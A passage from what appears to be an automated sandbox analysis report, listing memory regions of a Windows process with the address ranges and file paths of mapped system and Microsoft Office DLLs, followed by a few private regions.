"rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 286 start_va = 0x7fef46d0000 end_va = 0x7fef4731fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 287 start_va = 0x7fef4de0000 end_va = 0x7fef4e50fff entry_point = 0x7fef4de0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 288 start_va = 0x7fef5270000 end_va = 0x7fef527bfff entry_point = 0x7fef5270000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 289 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 290 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 291 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 292 start_va = 0x7fef6390000 end_va = 0x7fef6581fff entry_point = 0x7fef6390000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 293 start_va = 0x7fef67d0000 end_va = 0x7fef6843fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 294 start_va = 0x7fef79d0000 end_va = 0x7fef7bb9fff entry_point = 0x7fef79d0000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 295 start_va = 0x7fef7bc0000 end_va = 0x7fef7df9fff entry_point = 0x7fef7bc0000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 296 start_va = 0x7fef8c50000 end_va = 0x7fef8c8afff entry_point = 0x7fef8c50000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 297 start_va = 0x7fef97e0000 end_va = 0x7fef99fcfff entry_point = 0x7fef97e0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 298 start_va = 0x7fef9a00000 end_va = 0x7fef9d15fff entry_point = 0x7fef9a00000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 299 start_va = 0x7fef9d20000 end_va = 0x7fef9d22fff entry_point = 0x7fef9d20000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 300 start_va = 0x7fef9d30000 end_va = 0x7fef9d32fff entry_point = 0x7fef9d30000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 301 start_va = 0x7fef9d40000 end_va = 0x7fef9d42fff entry_point = 0x7fef9d40000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 302 start_va = 0x7fef9d50000 end_va = 0x7fef9d52fff entry_point = 0x7fef9d50000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 303 start_va = 0x7fef9d60000 end_va = 0x7fef9d64fff entry_point = 0x7fef9d60000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 304 start_va = 0x7fef9d70000 end_va = 0x7fef9d74fff entry_point = 0x7fef9d70000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 305 start_va = 0x7fef9d80000 end_va = 0x7fef9d82fff entry_point = 0x7fef9d80000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 306 start_va = 0x7fef9e30000 end_va = 0x7fef9e33fff entry_point = 0x7fef9e30000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 307 start_va = 0x7fef9e40000 end_va = 0x7fef9e43fff entry_point = 0x7fef9e40000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 308 start_va = 0x7fef9e50000 end_va = 0x7fef9e52fff entry_point = 0x7fef9e50000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 309 start_va = 0x7fef9e60000 end_va = 0x7fef9e63fff entry_point = 0x7fef9e60000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 310 start_va = 0x7fef9e70000 end_va = 0x7fef9e72fff entry_point = 0x7fef9e70000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 311 start_va = 0x7fef9e80000 end_va = 0x7fef9e82fff entry_point = 0x7fef9e80000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 312 start_va = 0x7fef9e90000 end_va = 0x7fef9e92fff entry_point = 0x7fef9e90000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 313 start_va = 0x7fef9ea0000 end_va = 0x7fef9ea2fff entry_point = 0x7fef9ea0000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 314 start_va = 0x7fef9eb0000 end_va = 0x7fef9eb2fff entry_point = 0x7fef9eb0000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 315 start_va = 0x7fef9ec0000 end_va = 0x7fef9ec2fff entry_point = 0x7fef9ec0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 316 start_va = 0x7fef9ed0000 end_va = 0x7fef9fc1fff entry_point = 0x7fef9ed0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 317 start_va = 0x7fef9fd0000 end_va = 0x7fef9fd3fff entry_point = 0x7fef9fd0000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 318 start_va = 0x7fef9fe0000 end_va = 0x7fef9ff5fff entry_point = 0x7fef9fe0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 319 start_va = 0x7fefa940000 end_va = 0x7fefa9e6fff entry_point = 0x7fefa940000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 320 start_va = 0x7fefa9f0000 end_va = 0x7fefaa44fff entry_point = 0x7fefa9f0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 321 start_va = 0x7fefaa50000 end_va = 0x7fefaa83fff entry_point = 0x7fefaa50000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 322 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 323 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 324 start_va = 0x7fefadd0000 end_va = 0x7fefaddafff entry_point = 0x7fefadd0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 325 start_va = 0x7fefade0000 end_va = 0x7fefadf4fff entry_point = 0x7fefade0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 326 start_va = 0x7fefae20000 end_va = 0x7fefae30fff entry_point = 0x7fefae20000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 327 start_va = 0x7fefae40000 end_va = 0x7fefae48fff entry_point = 0x7fefae40000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 328 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 329 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 330 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 331 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 332 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 333 start_va = 0x7fefb4d0000 end_va = 0x7fefb4fbfff entry_point = 0x7fefb4d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 334 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 335 start_va = 0x7fefb720000 end_va = 0x7fefb734fff entry_point = 0x7fefb720000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 336 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 337 start_va = 0x7fefb750000 end_va = 0x7fefb765fff entry_point = 0x7fefb750000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 338 start_va = 0x7fefb880000 end_va = 0x7fefb890fff entry_point = 0x7fefb880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 339 start_va = 0x7fefb8b0000 end_va = 0x7fefb9d9fff entry_point = 0x7fefb8b0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 340 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 341 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 342 start_va = 0x7fefbc30000 end_va = 0x7fefbe44fff entry_point = 0x7fefbc30000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 343 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 344 start_va = 0x7fefbeb0000 end_va = 0x7fefbfdbfff entry_point = 0x7fefbeb0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 345 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 346 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 347 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 348 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 349 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 350 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 351 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 352 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 353 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 354 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 355 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 356 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 357 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 358 start_va = 0x7fefd320000 end_va = 0x7fefd342fff entry_point = 0x7fefd320000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 359 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 360 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 361 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 362 start_va = 0x7fefd4d0000 end_va = 0x7fefd50cfff entry_point = 0x7fefd4d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 363 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 364 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 365 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 366 start_va = 0x7fefd680000 end_va = 0x7fefd6b9fff entry_point = 0x7fefd680000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 367 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 368 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 369 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 370 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 371 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 372 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 373 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 374 start_va = 0x7fefdbb0000 end_va = 0x7fefdcd9fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 375 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 376 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 377 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 378 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 379 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 380 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 381 start_va = 0x7fefec10000 end_va = 0x7fefed87fff entry_point = 0x7fefec10000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 382 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 383 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 384 start_va = 0x7feff080000 end_va = 0x7feff2d8fff entry_point = 0x7feff080000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 385 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 386 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 387 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 388 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 389 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 390 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 391 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 392 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 393 start_va = 0x7fffff60000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 394 start_va = 0x7fffff70000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 395 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 396 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 397 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 398 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" 